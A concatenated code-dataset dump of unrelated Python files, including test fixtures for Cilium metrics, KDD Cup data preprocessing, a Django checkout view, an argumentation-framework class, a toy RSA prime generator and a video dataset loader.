OPERATOR_AWS_METRICS, OPERATOR_METRICS\n\ntry:\n from contextlib import ExitStack\nexcept ImportError:\n from contextlib2 import ExitStack\n\nHERE = os.path.dirname(os.path.abspath(__file__))\nHOST = get_docker_hostname()\nAGENT_PORT = 9090\nOPERATOR_PORT = 6942\nAGENT_URL = \"http://{}:{}/metrics\".format(HOST, AGENT_PORT)\nOPERATOR_URL = \"http://{}:{}/metrics\".format(HOST, OPERATOR_PORT)\n\nPORTS = [AGENT_PORT, OPERATOR_PORT]\n\n\n@pytest.fixture(scope='session')\ndef dd_environment():\n with terraform_run(os.path.join(HERE, 'terraform')) as outputs:\n kubeconfig = outputs['kubeconfig']['value']\n with ExitStack() as stack:\n ip_ports = [\n stack.enter_context(port_forward(kubeconfig, 'cilium', 'cilium-operator', port)) for port in PORTS\n ]\n\n instances = {\n 'instances': [\n {\n 'agent_endpoint': 'http://{}:{}/metrics'.format(*ip_ports[0]),\n 'metrics': ADDL_AGENT_METRICS + AGENT_DEFAULT_METRICS,\n },\n {\n 'operator_endpoint': 'http://{}:{}/metrics'.format(*ip_ports[1]),\n 'metrics': OPERATOR_METRICS + OPERATOR_AWS_METRICS,\n },\n ]\n }\n\n yield instances\n\n\n@pytest.fixture(scope=\"session\")\ndef agent_instance():\n return {'agent_endpoint': AGENT_URL, 'tags': ['pod_test']}\n\n\n@pytest.fixture\ndef operator_instance():\n return {'operator_endpoint': OPERATOR_URL, 'tags': ['operator_test']}\n\n\n@pytest.fixture()\ndef mock_agent_data():\n f_name = os.path.join(os.path.dirname(__file__), 'fixtures', 'agent_metrics.txt')\n with open(f_name, 'r') as f:\n text_data = f.read()\n with mock.patch(\n 'requests.get',\n return_value=mock.MagicMock(\n status_code=200, iter_lines=lambda **kwargs: text_data.split(\"\\n\"), headers={'Content-Type': \"text/plain\"}\n ),\n ):\n yield\n\n\n@pytest.fixture()\ndef mock_operator_data():\n f_name = os.path.join(os.path.dirname(__file__), 'fixtures', 'operator_metrics.txt')\n with open(f_name, 'r') as f:\n text_data = f.read()\n with mock.patch(\n 'requests.get',\n return_value=mock.MagicMock(\n status_code=200, iter_lines=lambda **kwargs: text_data.split(\"\\n\"), headers={'Content-Type': \"text/plain\"}\n ),\n ):\n yield\n","sub_path":"cilium/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"364101846","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pandas as pd\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.preprocessing import MinMaxScaler, OneHotEncoder\n\nkddcup_names = open(\"../datastore/kddcup.names\").read().split('\\n')\nfeatures = []\nfor feature in kddcup_names[1:]:\n features.append(feature.split(':')[0].strip())\n\nfeatures.append(\"connection_type\")\n\n# data = pd.read_csv('../datastore/kddcup.data.csv', skiprows=0, nrows=494021)\n# data = data.drop(\"label\", axis=1)\n# data.to_csv(\"../datastore/kddcup.data_demo_0.csv\", index=False, header=None)\n# data = pd.read_csv(\"../datastore/kddcup.data_demo_0.csv\", names=features, index_col=False, header=None)\n# data.to_csv(\"../datastore/kddcup.data_demo_0.csv\", index=False)\n# data=pd.read_csv(\"../datastore/kddcup.data_demo.csv\")\ndata = pd.read_csv(\"../datastore/kddcup.data_10_percent_with_header.csv\")\n\nprint(data)\n\n\ndef one_hot_encoder(data, features):\n \"\"\"\n one hot encoding text values to dummy variables\n\n :param data:\n :param feature:\n :return:\n \"\"\"\n for feature in features:\n dummies = pd.get_dummies(data[feature])\n for x in dummies.columns:\n dummy_feature = f\"{feature}-{x}\"\n data[dummy_feature] = dummies[x]\n data.drop(feature, axis=1, inplace=True)\n\n\ndef zscore_numeric_encoder(data, features, mean=None, sd=None):\n \"\"\"\n Encode numerical columns as z-scores\n\n :param data:\n :param feature:\n :param mean:\n :param sd:\n :return:\n \"\"\"\n for feature in features:\n if mean is None:\n mean = data[feature].mean()\n\n if sd is None:\n sd = data[feature].std()\n\n data[feature] = (data[feature] - mean) / sd\n\n\ntransformer = make_column_transformer(\n\n (MinMaxScaler(),\n ['duration', 'src_bytes', 'dst_bytes', 'wrong_fragment', 'urgent',\n 'hot', 'num_failed_logins', 'num_compromised', 'root_shell',\n 'su_attempted',\n 'num_root', 'num_file_creations', 'num_shells', 'num_access_files',\n 'num_outbound_cmds',\n 'count', 'srv_count', 'serror_rate', 'srv_serror_rate', 'rerror_rate',\n 'srv_rerror_rate',\n 'same_srv_rate', 'diff_srv_rate', 'srv_diff_host_rate', 'dst_host_count',\n 'dst_host_srv_count',\n 'dst_host_same_srv_rate', 'dst_host_diff_srv_rate',\n 'dst_host_same_src_port_rate',\n 'dst_host_srv_diff_host_rate',\n 'dst_host_serror_rate', 'dst_host_srv_serror_rate',\n 'dst_host_rerror_rate',\n 'dst_host_srv_rerror_rate'\n ]\n ),\n\n (OneHotEncoder(handle_unknown=\"ignore\"),\n ['protocol_type', 'service', 'flag', 'land', 'logged_in', 'is_host_login', 'is_guest_login'])\n\n)\n\ntransformer.fit(data)\ntransformer.transform(data)\n\n# def transform_data(data):\n# categorical_features = ['protocol_type', 'service', 'flag', 'land', 'logged_in', 'is_host_login', 'is_guest_login']\n#\n# one_hot_encoder(data, categorical_features)\n# non_categorical_features = ['duration', 'src_bytes', 'dst_bytes', 'wrong_fragment', 'urgent',\n# 'hot', 'num_failed_logins', 'num_compromised', 'root_shell', 'su_attempted',\n# 'num_root', 'num_file_creations', 'num_shells', 'num_access_files', 'num_outbound_cmds',\n# 'count', 'srv_count', 'serror_rate', 'srv_serror_rate', 'rerror_rate',\n# 'srv_rerror_rate',\n# 'same_srv_rate', 'diff_srv_rate', 'srv_diff_host_rate', 'dst_host_count',\n# 'dst_host_srv_count',\n# 'dst_host_same_srv_rate', 'dst_host_diff_srv_rate', 'dst_host_same_src_port_rate',\n# 'dst_host_srv_diff_host_rate',\n# 'dst_host_serror_rate', 'dst_host_srv_serror_rate', 'dst_host_rerror_rate',\n# 'dst_host_srv_rerror_rate'\n# ]\n#\n# zscore_numeric_encoder(data, non_categorical_features)\n# print(data.head())\n#\n# return data\n\n\n# data = transform_data(data)\n\nprint(data)\n\n\n","sub_path":"source/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"604218887","text":"\"\"\"\n 自定义对象使用运算符\n 减法\n\"\"\"\n\n\nclass Vector2:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __isub__(self, other):\n self.x -= other.x\n self.y -= other.y\n return self\n\n\npos01 = Vector2(3, 2)\npos02 = Vector2(1, 5)\nprint(id(pos01))\npos01 -= pos02\nprint(id(pos01))\nprint(pos01.__dict__)\n","sub_path":"fancy_month01/day11_fancy/day11_teacher/exercise03.py","file_name":"exercise03.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"147160153","text":"\"\"\" The Control Argumentation Framework (CAF) class.\n\nThis class represent a CAF, which is a more complex variation of an AF.\nWhereas an AF was used to represent the knowledge of a single Agent,\na CAF represents what an Agent knows of the knowledge of another Agent.\n\nThe arguments are separated into fixed, uncertain and control arguments.\n* Fixed arguments are arguments that are certainly in the other Agent's\n knowledge.\n* Uncertain arguments are arguments that may possibly be in the other\n Agent's knowledge.\n* Control arguments are arguments that can be used against fixed or\n uncertain arguments that attack arguments that are in favor of some of\n the Agent's offers.\n\nSimilarly, the attacks are separated into fixed, uncertain directed,\ncertain undirected, and control attacks.\n* Fixed attacks are attacks that are certainly in the other Agent's\n knowledge.\n* Uncertain directed attacks are attacks that may be in the other\n Agent's knowledge.\n* Certain undirected attacks are attacks that are in the other Agent's\n knowledge, but the direction is not known.\n* Control attacks are attacks from control arguments.\n\nLike in the AF, the CAF indicates which (practical) arguments support\nwhich offers (in the theory of one Agent about the knowledge of\nanother).\n\"\"\"\n\nfrom pydot import Dot, Node, Edge\nimport config as cf\n\n\nclass CAF():\n \"\"\"docstring for Control Argumentation Frameworks\"\"\"\n def __init__(self, arg_f=None, arg_u=None, arg_c=None,\n att_f=None, att_u=None, att_b=None, att_c=None,\n supp_args=None):\n self.arg_f = set() if arg_f is None else arg_f # fixed arguments\n self.arg_u = set() if arg_u is None else arg_u # uncertain arguments\n self.arg_c = set() if arg_c is None else arg_c # control arguments\n\n self.att_f = set() if att_f is None else att_f # fixed attacks\n self.att_u = set() if att_u is None else att_u # uncertain directed\n self.att_b = set() if att_b is None else att_b # certain undirected\n self.att_c = set() if att_c is None else att_c # control attacks\n\n self.supp_args = supp_args\n\n # Extend the set of fixed arguments by the set of arguments that\n # support offers.\n if supp_args:\n for arg in self.supp_args.values():\n self.arg_f |= arg\n\n def __repr__(self):\n \"\"\" How CAFs are represented when they are printed directly.\"\"\"\n return \"{}{}{}{}{}{}{}{}\".format(\n (f\"arg_f: {self.arg_f}, \" if self.arg_f else ''),\n (f\"arg_u: {self.arg_u}, \" if self.arg_u else ''),\n (f\"arg_c: {self.arg_c}, \" if self.arg_c else ''),\n (f\"att_f: {self.att_f}, \" if self.att_f else ''),\n (f\"att_u: {self.att_u}, \" if self.att_u else ''),\n (f\"att_b: {self.att_b}, \" if self.att_b else ''),\n (f\"att_c: {self.att_c}.\" if self.att_c else ''),\n (f\"supp_args: {self.supp_args}.\"))\n\n def visualize(self, filename):\n \"\"\"Save a graphical representation of this AF.\"\"\"\n graph = Dot(graph_type='digraph')\n\n for arg in self.arg_f: # Fixed arguments\n text = arg.text\n\n # Add any offers to the text that this argument may support\n for off, supp in self.supp_args.items():\n if arg in supp:\n text += f\"\\n[{off}]\"\n\n graph.add_node(Node(\n name=text, style=\"filled\", fillcolor=cf.COLOR_FIXED))\n\n for arg in self.arg_u: # Uncertain arguments\n graph.add_node(Node(\n name=arg.text, style=\"filled\", fillcolor=cf.COLOR_UNCERTAIN))\n\n for arg in self.arg_c: # Control arguments\n graph.add_node(Node(\n name=arg.text, style=\"filled\", fillcolor=cf.COLOR_CONTROL))\n\n for att in self.att_f: # Fixed attacks\n if att.arg_start in self.arg_f | self.arg_u and \\\n att.arg_end in self.arg_f | self.arg_u:\n texts = []\n\n for arg in [att.arg_start, att.arg_end]:\n texts.append(arg.text)\n\n for off, supp in self.supp_args.items():\n if arg in supp:\n texts[-1] += f\"\\n[{off}]\"\n graph.add_edge(Edge(texts[0],\n texts[1],\n color=cf.COLOR_FIXED,\n dirType=\"forward\"))\n else:\n print(\"Warning: attack in CAF but not its start or end\")\n\n for att in self.att_u: # Uncertain attacks\n if att.arg_start in self.arg_f | self.arg_u and \\\n att.arg_end in self.arg_f | self.arg_u:\n texts = []\n\n for arg in [att.arg_start, att.arg_end]:\n texts.append(arg.text)\n\n for off, supp in self.supp_args.items():\n if arg in supp:\n texts[-1] += f\"\\n[{off}]\"\n graph.add_edge(Edge(texts[0],\n texts[1],\n color=cf.COLOR_UNCERTAIN,\n dirType=\"both\",\n style=\"dashed\"))\n else:\n print(\"Warning: attack in CAF but not its start or end\")\n\n for att in self.att_b: # Bidirectional attacks\n if att.arg_start in self.arg_f | self.arg_u and \\\n att.arg_end in self.arg_f | self.arg_u:\n texts = []\n\n for arg in [att.arg_start, att.arg_end]:\n texts.append(arg.text)\n\n for off, supp in self.supp_args.items():\n if arg in supp:\n texts[-1] += f\"\\n[{off}]\"\n graph.add_edge(Edge(texts[0],\n texts[1],\n color=cf.COLOR_UNCERTAIN,\n dirType=\"forward\"))\n else:\n print(\"Warning: attack in CAF but not its start or end\")\n\n for att in self.att_c: # Control attacks\n if att.arg_start in self.arg_c and \\\n att.arg_end in self.arg_c | self.arg_f | self.arg_u:\n texts = []\n\n for arg in [att.arg_start, att.arg_end]:\n texts.append(arg.text)\n\n for off, supp in self.supp_args.items():\n if arg in supp:\n texts[-1] += f\"\\n[{off}]\"\n graph.add_edge(Edge(texts[0],\n texts[1],\n color=cf.COLOR_CONTROL,\n dirType=\"forward\"))\n else:\n print(\"Warning: attack in CAF but not its start or end\")\n\n graph.write_png(filename)\n","sub_path":"caf.py","file_name":"caf.py","file_ext":"py","file_size_in_byte":6889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636482483","text":"\n\nfrom xai.brain.wordbase.nouns._attribution import _ATTRIBUTION\n\n#calss header\nclass _ATTRIBUTIONS(_ATTRIBUTION, ):\n\tdef __init__(self,): \n\t\t_ATTRIBUTION.__init__(self)\n\t\tself.name = \"ATTRIBUTIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"attribution\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_attributions.py","file_name":"_attributions.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525396247","text":"\"\"\"\n Keep a custom script for permit render other times of documents, ie.: Software Installation.\n\"\"\"\nfrom Products.ZSQLCatalog.SQLCatalog import ComplexQuery, SimpleQuery\n\nportal = context.getPortalObject()\n\nquery = ComplexQuery(\n ComplexQuery(\n SimpleQuery(portal_type=\"Support Request\"),\n SimpleQuery(default_aggregate_uid=context.getUid()),\n logical_operator='and'),\n ComplexQuery(\n SimpleQuery(portal_type=\"Upgrade Decision Line\"),\n SimpleQuery(default_aggregate_uid=context.getUid()),\n logical_operator='and'),\n logical_operator='or')\n\n# Use event modification date instead. \nkw['sort_on'] = ((\"catalog.simulation_state='suspended'\", 'DESC'),\n (\"catalog.simulation_state='validated'\", 'DESC'),\n (\"catalog.simulation_state='confirmed'\", 'DESC'),\n ('modification_date', 'DESC'),)\nkw['simulation_state'] = \"NOT cancelled\"\nkw['limit'] = 30\nresult_list = []\nfor document in portal.portal_catalog(query=query, **kw):\n if document.getPortalType() == \"Upgrade Decision Line\":\n result_list.append(document.getParentValue())\n continue\n result_list.append(document)\nreturn result_list\n","sub_path":"master/bt5/slapos_crm/SkinTemplateItem/portal_skins/slapos_crm_monitoring/Base_getOpenRelatedTicketList.py","file_name":"Base_getOpenRelatedTicketList.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"262738128","text":"from django.core.management.base import BaseCommand\nfrom core.models import User, Team\nfrom guardian.shortcuts import assign_perm\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"who\", type=str)\n parser.add_argument(\"permission\", type=str)\n parser.add_argument(\"team\", type=str)\n\n def handle(self, *args, **options):\n\n who = options[\"who\"]\n if \"@\" in who:\n assign_to = User.objects.get(email=who)\n else:\n assign_to = Team.objects.get(name=who)\n team = Team.objects.get(name=options[\"team\"])\n permission = options[\"permission\"]\n\n assert team.active\n assign_perm(permission, assign_to, team)\n # assert assign_to.has_perm(permission, team)\n","sub_path":"backend/dev_helpers/management/commands/add_team_permission.py","file_name":"add_team_permission.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"23878543","text":"from random import randint\nimport miller_rabin\n\n\ndef produce_p_q(w): # 生成p,q\n while 1:\n temp = [1]\n for i in range(w - 2):\n c = randint(0, 1)\n temp.append(c)\n temp.append(1)\n ls2 = [str(j) for j in temp]\n ls3 = ''.join(ls2)\n b = int(ls3[0])\n for i2 in range(len(ls3) - 1):\n b = b << 1\n b = b + int(ls3[i2 + 1])\n if miller_rabin.Miller_Rabin(b):\n return b\n\n\ndef euler(e, n1):\n temp1 = e\n temp2 = n1\n temp = [(e, n1)]\n try:\n while temp1 != 1:\n temp2 = temp2 % temp1\n temp.append((temp1, temp2))\n temp1 = temp1 % temp2\n temp.append((temp1, temp2))\n k = 0\n d = 0\n for j, i in enumerate(temp[::-1], 1):\n if j % 2 == 1:\n d = int((i[1] * k + 1) / i[0])\n else:\n k = int((1 - i[0] * d) / (-i[1]))\n return d\n except:\n return 0\n\n\ndef produce_key():\n p = produce_p_q(350)\n q = produce_p_q(350)\n with open('G:/RSA.txt', 'w') as file:\n file.write(str(p))\n file.write('\\n')\n file.write(str(q))\n\n\nif __name__ == '__main__':\n produce_key()\n\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"493507967","text":"from django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .forms import OrderForm\nfrom shopping_bag.context import shopping_bag_contents\nfrom products.models import Product\nfrom .models import Order, OrderLineItem\nfrom profiles.models import UserProfile\n\nimport stripe\n\n\n@login_required\ndef checkout(request):\n stripe_public_key = settings.STRIPE_PUBLIC_KEY\n stripe_secret_key = settings.STRIPE_SECRET_KEY\n\n current_shopping_bag = shopping_bag_contents(request)\n total = current_shopping_bag['total']\n\n if request.method == 'POST':\n shopping_bag = request.session.get('shopping_bag', {})\n print(\"ADDED BY JO: SHOPPING BAG ON LINE 20 = \", shopping_bag)\n\n form_data = {\n 'name': request.POST['name'],\n 'email': request.POST['email'],\n 'phone_number': request.POST['phone_number'],\n 'street_address': request.POST['street_address'],\n 'postcode': request.POST['postcode'],\n 'town_or_city': request.POST['town_or_city'],\n 'country': request.POST['country'],\n }\n\n order_form = OrderForm(form_data)\n if order_form.is_valid():\n order = order_form.save()\n order.total = total\n order.save()\n for item_id, item in shopping_bag.items():\n try:\n product = Product.objects.get(id=item_id)\n order_line_item = OrderLineItem(\n order=order,\n product=product,\n )\n order_line_item.save()\n except Product.DoesNotExist:\n messages.errror(request, (\n \"One of the products in your bag wasn't \\\n found in our database.\")\n )\n order.delete()\n\n return redirect(reverse(shopping_bag))\n\n return redirect(reverse('checkout_success',\n args=[order.order_number]))\n else:\n messages.error(request, 'There was an error with your form. \\\n Please check your information.')\n else:\n shopping_bag = request.session.get('shopping_bag')\n if not shopping_bag:\n return redirect(reverse('products'))\n\n current_shopping_bag = shopping_bag_contents(request)\n total = current_shopping_bag['total']\n stripe_total = round(total * 100)\n stripe.api_key = stripe_secret_key\n intent = stripe.PaymentIntent.create(\n amount=stripe_total,\n currency=settings.STRIPE_CURRENCY,\n )\n\n if request.user.is_authenticated:\n try:\n profile = UserProfile.objects.get(user=request.user)\n order_form = OrderForm(initial={\n 'name': profile.default_name,\n 'email': profile.user.email,\n 'phone_number': profile.default_phone_number,\n 'country': profile.default_country,\n 'postcode': profile.default_postcode,\n 'town_or_city': profile.default_town_or_city,\n 'street_address': profile.default_street_address,\n })\n except UserProfile.DoesNotExist:\n order_form = OrderForm()\n else:\n order_form = OrderForm()\n\n template = 'checkout/checkout.html'\n context = {\n 'order_form': order_form,\n 'stripe_public_key': stripe_public_key,\n 'client_secret': intent.client_secret,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef checkout_success(request, order_number):\n\n order = get_object_or_404(Order, order_number=order_number)\n\n profile = UserProfile.objects.get(user=request.user)\n order.user_profile = profile\n order.save()\n\n if 'shopping_bag' in request.session:\n del request.session['shopping_bag']\n\n template = 'checkout/checkout_success.html'\n context = {\n 'order': order,\n }\n\n return render(request, template, context)\n","sub_path":"checkout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"152056174","text":"# encoding: utf-8\r\n\"\"\"\r\n@author:Sharp_Yi\r\n@file: demo2.py\r\n@time:2018/6/16 20:03\r\n\"\"\"\r\n\r\nimport json\r\nimport os\r\nimport threading\r\nimport datetime as d\r\nimport gevent\r\nimport jsonpath\r\nimport requests\r\ndef work(url):\r\n with open(\"./pic/img{}.jpg\".format(d.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")), 'wb') as f:\r\n f.write(requests.get(url).content)\r\ndef writetxt(*args):\r\n tmp = \"\"\r\n for i in args:\r\n tmp += str(i) + \" \"\r\n with open(\"./txt/report{}.txt\".format(d.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")), 'w',encoding='utf-8') as f:\r\n f.writelines(tmp)\r\ndef fun(index, json_list):\r\n json_content = json.load(open(json_list[index],encoding='utf-8'))\r\n title_list = jsonpath.jsonpath(json_content, '$.subjects[*].title')\r\n rate_list = jsonpath.jsonpath(json_content, '$.subjects[*].rate')\r\n img_url = jsonpath.jsonpath(json_content, '$.subjects[*].cover')\r\n ulr_list = jsonpath.jsonpath(json_content, '$.subjects[*].url')\r\n\r\n gevent.joinall(\r\n [gevent.spawn(work, i) for i in img_url]\r\n )\r\n gevent.joinall(\r\n [gevent.spawn(writetxt, i) for i in zip(title_list, rate_list, ulr_list)]\r\n )\r\ndef deletefiles(index):\r\n options= [\"./pic\",\"./txt\"]\r\n if os.listdir(options[index]):\r\n for i in os.listdir(options[index]):\r\n os.remove(os.path.join(options[index],i))\r\ndef run():\r\n t_ = []\r\n for i in range(2):\r\n t =threading.Thread(target=deletefiles, args=(i,))\r\n t.start()\r\n t_.append(t)\r\n return t_\r\ndef until():\r\n os.listdir(\".\")\r\n print(os.listdir(\".\"))\r\n # jsonpath.jsonpath()\r\n\r\n json_list = []\r\n\r\n for i in os.listdir(\".\"):\r\n if i.endswith(\".json\"):\r\n json_list.append(i)\r\n print(json_list)\r\n\r\n t_list = []\r\n\r\n for i in range(json_list.__len__()):\r\n t = threading.Thread(target=fun, args=(i, json_list))\r\n t.start()\r\n t_list.append(t)\r\n\r\n for i in t_list:\r\n i.join()\r\ndef main():\r\n wait_list = run()\r\n for i in wait_list:\r\n i.join()\r\n until()\r\n","sub_path":"demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"81889454","text":"\r\n\r\nprint(\" Welcome to this HTML builder!\")\r\nprint(\"*********************************************************************************************\")\r\nprint(\"Type in the information requested to make formatted HTML code. Hit enter after each question.\")\r\nprint(\"*********************************************************************************************\")\r\nprint()\r\n\r\nhtml_project_title = input(\"What is the name of your HTML project? \")\r\nstage_number_string = input(\"How many Course Stages does your notes cover (e.g. 1, 2, 3...)? \")\r\nstage_number = int(stage_number_string)\r\n\r\nif stage_number != 0:\r\n s = 1\r\n st = []\r\n lt = []\r\n lc = []\r\n html_total = ['', ['', '']]\r\n while stage_number > 0:\r\n try:\r\n s = str(s)\r\n stage_title = input((\"What is the title for Stage\") + ' ' + s + (\"? \"))\r\n \r\n get_lesson_number = input((\"How many lessons does Stage \") + ' ' + s + ' ' + (\"contain? Please use integers only. \"))\r\n \r\n lesson_number = int(get_lesson_number)\r\n if lesson_number == 0:\r\n print(\"You do not have any lessons. What are you trying to pull?\")\r\n elif lesson_number != 0:\r\n n = 1\r\n while lesson_number > 0:\r\n n = str(n)\r\n lesson_title = input((\"What is the title for Lesson\") + ' ' + n + (\"? \"))\r\n lesson_contents = input((\"What is the topic of Lesson\") + ' ' + n + (\"? \"))\r\n \r\n lt.append(lesson_title)\r\n \r\n lc.append(lesson_contents)\r\n html_total.append([stage_title, [lesson_title, lesson_contents]])\r\n lesson_number = lesson_number - 1\r\n n = int(n)\r\n n = n + 1\r\n except ValueError:\r\n print(\"That's not a number. This is a number: 7\")\r\n \r\n \r\n st.append(stage_title) \r\n stage_number = stage_number - 1\r\n s = int(s)\r\n s = s + 1\r\nelse:\r\n print(\"You do not have any stages, therefore you have no business here.\")\r\nhtml_total = html_total[2:]\r\n\r\n\r\nprint(\"_____________________________________________________\") \r\nprint(\"************** Here is your HTML code! **************\")\r\nprint(\"_____________________________________________________\") \r\nprint(\"\"\"\r\n \r\n \r\n \r\n \"\"\"+html_project_title+\"\"\"\r\n \r\n \r\n \r\n
\r\n \"\"\"+html_project_title+\"\"\"\r\n
\"\"\")\r\n\r\nfor piece in html_total:\r\n stage_title_alone = piece[0]\r\n \r\n lesson_title_alone = piece[1][0]\r\n lesson_contents_alone = piece[1][1]\r\n lesson_title_alone = str(lesson_title_alone)\r\n lesson_contents_alone = str(lesson_contents_alone)\r\n print(\"\"\"\r\n
\r\n \"\"\" + stage_title_alone + \"\"\"\r\n
\"\"\"\r\n \"\"\"\r\n
\r\n \"\"\" + lesson_title_alone + \"\"\"\r\n
\"\"\"\r\n \"\"\"\r\n
\r\n \"\"\" + lesson_contents_alone + \"\"\"\r\n
\"\"\"\r\n )\r\n\r\n \r\n#closing lines \r\nprint(\"\"\"\r\n \r\n \"\"\")\r\n\r\n","sub_path":"html_generator.py","file_name":"html_generator.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76384996","text":"import node as node\n\n\nchain = node.create(4, next=None)\nchain = node.create(5, chain)\nchain = node.create(1, chain)\nchain = node.create(2, chain)\nchain = node.create(3, chain)\n\n# Write a recursive function for each of the following:\n# Assume that a node chain starts with the reference stored in\n# the variable chain.\n\n\n# 1. Displays the data values stored in a node-chain\n\ndef display(theNode):\n if theNode==None:\n print()\n return None\n else:\n print(node.get_data(theNode), end=' ')\n display(node.get_next(theNode))\n return None\n\ndisplay(chain)\n\n# 2. Counts the number of nodes in a node-chain\n\ndef count(anode):\n \"\"\"\n :param: anode: a node\n :return: the number of nodes in the chain\n \"\"\"\n if anode is None:\n return 0\n else:\n return count(node.get_next(anode)) + 1\n\nprint(count(chain))\n\n# 3. Calculates the sum of the numbers stored in a node-chain\n\ndef sum(anode):\n if anode == None:\n return 0\n else:\n return node.get_data(anode) + sum(node.get_next(anode))\n\n\nprint(sum(chain))\n\n","sub_path":"examples/ch11/exercises_part4_recursion.py","file_name":"exercises_part4_recursion.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45155451","text":"import random\nimport numpy as np\nimport os\nfrom pathlib import Path\nimport pandas as pd\nimport re\nfrom sklearn.preprocessing import LabelEncoder\nimport random\nimport utils2 as utils\n\n\nclass Dataset():\n def __init__(self, args):\n self.test_path = '/media/ash/New Volume/dataset/UCF_crime'+\\\n '/custom_split_C3D/Custom_test_split_mini.txt'\n self.train_path = '/media/ash/New Volume/dataset/UCF_crime/'+\\\n 'custom_split_C3D/Custom_train_split_mini_abnormal.txt'\n self.dataset_name = args.dataset_name\n self.num_class = args.num_class\n self.feature_size = args.feature_size\n # self.path_to_features = self.dataset_name + '-I3D-JOINTFeatures.npy'\n # self.path_to_annotations = self.dataset_name + '-Annotations/'\n self.features = [] #np.load(self.path_to_features, encoding='bytes')\n # self.segments = np.load(self.path_to_annotations + 'segments.npy')\n self.labels = [] #np.load(self.path_to_annotations + 'labels_all.npy') # Specific to Thumos14\n self.classlist = set() # np.load(self.path_to_annotations + 'classlist.npy')\n self.subset = [] # np.load(self.path_to_annotations + 'subset.npy')\n self.batch_size = args.batch_size\n self.t_max = args.max_seqlen\n self.trainidx = []\n self.testidx = []\n self.classwiseidx = []\n self.currenttestidx = 0\n\n self.get_data_label()\n\n self.labels_multihot = [utils.strlist2multihot(labs, self.classlist)\n for labs in self.labels]\n\n self.train_test_idx()\n self.classwise_feature_mapping()\n\n def get_data_label(self):\n prog = re.compile('[^a-zA-Z]')\n with open(self.train_path, 'r') as fp:\n for line in fp:\n line = line.rstrip()\n self.features.append(line)\n name = line.split(os.path.sep)[-1]\n _category = prog.split(name)[0]\n self.classlist.add(_category)\n self.subset.append('train')\n self.labels.append([_category])\n\n with open(self.test_path, 'r') as fp:\n for line in fp:\n line = line.rstrip()\n self.features.append(line)\n name = line.split(os.path.sep)[-1]\n _category = prog.split(name)[0]\n self.classlist.add(_category)\n self.subset.append('test')\n self.labels.append([_category])\n self.classlist = sorted(list(self.classlist))\n\n def train_test_idx(self):\n for i, s in enumerate(self.subset):\n if s == 'train': # Specific to Thumos14\n self.trainidx.append(i)\n else:\n self.testidx.append(i)\n\n def classwise_feature_mapping(self):\n for category in self.classlist:\n idx = []\n for i in self.trainidx:\n for label in self.labels[i]:\n if label == category:\n idx.append(i)\n break\n self.classwiseidx.append(idx)\n\n def _load(self, path, normalize=False):\n x = np.load(path)\n if normalize:\n x = x/np.linalg.norm(x)\n return x\n\n def load_data(self, n_similar=3, is_training=True):\n if is_training:\n features = []\n labels = []\n idx = []\n\n # Load similar pairs\n rand_classid = np.random.choice(len(self.classwiseidx), size=n_similar)\n for rid in rand_classid:\n rand_sampleid = np.random.choice(len(self.classwiseidx[rid]), size=2)\n idx.append(self.classwiseidx[rid][rand_sampleid[0]])\n idx.append(self.classwiseidx[rid][rand_sampleid[1]])\n\n # Load rest pairs\n rand_sampleid = np.random.choice(len(self.trainidx), size=self.batch_size-2*n_similar)\n for r in rand_sampleid:\n idx.append(self.trainidx[r])\n\n data = np.array([utils.process_feat(self._load(self.features[i]), self.t_max)\n for i in idx])\n labels = np.array([self.labels_multihot[i] for i in idx])\n return data, labels\n\n else:\n labs = self.labels_multihot[self.testidx[self.currenttestidx]]\n feat = self._load(self.features[self.testidx[self.currenttestidx]])\n\n if self.currenttestidx == len(self.testidx)-1:\n done = True\n self.currenttestidx = 0\n else:\n done = False\n self.currenttestidx += 1\n\n return np.array(feat), np.array(labs), done\n\n def load_valid(self):\n indices = np.random.choice(self.testidx, size=self.batch_size)\n data = np.array([utils.process_feat(self._load(self.features[i]),\n self.t_max) for i in indices])\n labels = np.array([self.labels_multihot[i] for i in indices])\n return data, labels\n\n def load_one_test(self):\n for idx in 